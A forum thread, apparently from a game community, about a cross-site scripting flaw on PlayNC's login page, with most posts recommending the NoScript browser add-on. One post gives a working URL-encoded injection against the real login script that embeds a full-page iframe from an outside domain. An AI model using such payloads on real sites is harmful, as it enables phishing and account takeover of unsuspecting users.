Originally Posted by lyra_song
*pats No Script*
|
PlayNC XSS proof of concept
derc
Quote:
Kapral
Doesn't work anymore? It did before, but I just checked it and it takes me to the login page now, I even changed the stuff after the language=
lyra_song
Remember folks.
http://noscript.net/
Browse with control. Its a firefox plugin.
No Script blocks Javascript/Java/Flash on EVERY page.
Its good protection against XSS hacks, and other script based nuisances. But you will have to set all your favorite sites to "allow" or else you can't browse normally (no mouseovers, etc). Otherwise its a good warning/protection system (unless you get DNS hacked...but lets not get into that).
USE IT NOW.
http://noscript.net/
Browse with control. Its a firefox plugin.
No Script blocks Javascript/Java/Flash on EVERY page.
Its good protection against XSS hacks, and other script based nuisances. But you will have to set all your favorite sites to "allow" or else you can't browse normally (no mouseovers, etc). Otherwise its a good warning/protection system (unless you get DNS hacked...but lets not get into that).
USE IT NOW.
Serenity Divinity
Quote:
Originally Posted by lyra_song
*pats No Script*
|
gone
-but yeah no script is just one of them. if you use it, gogo you!
another one I use faithfully...
http://qfxsoftware.com/
and I must add...lol.. no script has told it's users about this sort of thing for quite some time via pop-up/error console.
another one I use faithfully...
http://qfxsoftware.com/
and I must add...lol.. no script has told it's users about this sort of thing for quite some time via pop-up/error console.
warcrap
i dont see any problems cause im using firefox the only problem is that they havnt changed the 2007 on the bottom to 2008 or 2009.
I MP I
Wonder if all these people claiming to have been hacked were with this method. Either way I'm going to go have some drinks.
DarkNecrid
they fixed it, me thinks.
Karuro
Quote:
Originally Posted by warcrap
i dont see any problems cause im using firefox the only problem is that they havnt changed the 2007 on the bottom to 2008 or 2009.
|
Or someone can try to do the previous again to see if they fixed the actual problem.
MithranArkanere
My FireFox has anti XSS exploit subroutines, so I don't care a bout that.
Snograt
Heh, nice.
You seem to have made bugchasing on NCSoft and ANet sites a personal crusade, eh Pablo?
[edit] Hmm, got paranoid enough to install NoScript. Who or what is Quantserve.com?
[edit2] nvm -
You seem to have made bugchasing on NCSoft and ANet sites a personal crusade, eh Pablo?
[edit] Hmm, got paranoid enough to install NoScript. Who or what is Quantserve.com?
[edit2] nvm -
Quote:
Originally Posted by quantserve redirect to quantcast.com
What is Quantcast?
From Quantcast Quantcast is the World’s Only Open Internet Ratings Service Quantcast is a new media measurement service that lets advertisers view audience reports on millions of websites and services. Only Quantcast combines directly measured audience data with panel-based estimates to deliver accurate third-party metrics and easy-to-read profiles on digital media properties. Advertisers – Find an Audience! View detailed audience reports for millions of websites and services to find the audiences you seek and build your brand online with confidence. Publishers – Make Your Audience Count! Demonstrate the unique value of your audiences and attract advertisers by tagging your websites, videos, widgets and games for direct measurement. |
rohara
Quote:
Originally Posted by lyra_song
Remember folks.
http://noscript.net/ Browse with control. Its a firefox plugin. No Script blocks Javascript/Java/Flash on EVERY page. Its good protection against XSS hacks, and other script based nuisances. But you will have to set all your favorite sites to "allow" or else you can't browse normally (no mouseovers, etc). Otherwise its a good warning/protection system (unless you get DNS hacked...but lets not get into that). USE IT NOW. |
...
anyways. as a web developer, this makes me QQ. for shame, plaync!
Snograt
Sure, javascript isn't evil. Neither are guns...
Stockholm
hxxps://secure.plaync.com/cgi-bin/plaync_login.pl?language="%20%20%20%20%20%20%20%20 %20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2 0%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 %20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2 0%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 %20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2 0%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 %20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2 0%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 %20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2 0%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 %20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2 0%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 %20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2 0%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% 20%20%20%20%20%20%20%20%20%20%20%3E%57%48%59%3F%21 %20%57%68%79%20%64%6F%65%73%20%50%6C%61%79%4E%43%2 0%68%61%76%65%20%61%6E%20%58%53%53%20%66%6C%61%77% 20%72%69%67%68%74%20%6F%6E%20%74%68%65%69%72%20%6C %6F%67%69%6E%20%70%61%67%65%3F%3C%69%66%72%61%6D%6 5%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%70%6C%61% 79%6E%63%2E%6A%75%73%74%67%6F%74%6F%77%6E%65%64%2E %63%6F%6D%22%20%77%69%64%74%68%3D%22%31%30%30%25%2 2%20%65%69%67%68%74%3D%22%31%30%30%25%22%3E%3C%2F% 69%66%72%61%6D%65%3E%3C%6E%6F%66%72%61%6D%65%73%3E
No change so far, still same as earlier.
No change so far, still same as earlier.
Kashrlyyk
Quote:
Originally Posted by Kashrlyyk
Thanks that worked!
|
zwei2stein
Quote:
Originally Posted by slowerpoke
if this is an expolit you should prolly report it to them and not advertise it here
|
Riot Narita
Quote:
Originally Posted by rohara
you noscript fanatics are missing out on a lot of sweet ajax implements...just sayin. javascript isn't evil.
|
Friday
Quote:
Originally Posted by Hissy
You don't miss out on anything by using NoScript. It simply gives you control over what is allowed to run in your browser. It blocks everything by default, but if you want to see something on a page (and you trust it), you can choose to allow it.
|
The add-ons for Firefox also have a cookie blocker, java blocker and others that I use, which function in exactly the same way. It gives ME the choice of what I wish to get dumped on me, not the other way round.
ducktape
Ok, I got to the party a bit late and missed most of this, but I am wondering...was it a redirect/phish combo, or was PlayNC lazy with cookie validation and made it so that someone could steal the PlayNC session cookie off -your- machine and use that stolen cookie on -their- machine to log in to PlayNC under -your- PlayNC account using the stolen session cookie?
The second option is like the big hotmail hackings from a couple years ago, so shame shame SHAME on them if that's what happened to peoples' PlayNC accounts.
Also, thanks Pablo for pointing out the PlayNC security problem to everyone so that PlayNC would do something about it!
The second option is like the big hotmail hackings from a couple years ago, so shame shame SHAME on them if that's what happened to peoples' PlayNC accounts.
Also, thanks Pablo for pointing out the PlayNC security problem to everyone so that PlayNC would do something about it!
Chthon
Quote:
Originally Posted by ducktape
Ok, I got to the party a bit late and missed most of this, but I am wondering...was it a redirect/phish combo, or was PlayNC lazy with cookie validation and made it so that someone could steal the PlayNC session cookie off -your- machine and use that stolen cookie on -their- machine to log in to PlayNC under -your- PlayNC account using the stolen session cookie?
The second option is like the big hotmail hackings from a couple years ago, so shame shame SHAME on them if that's what happened to peoples' PlayNC accounts. Also, thanks Pablo for pointing out the PlayNC security problem to everyone so that PlayNC would do something about it! |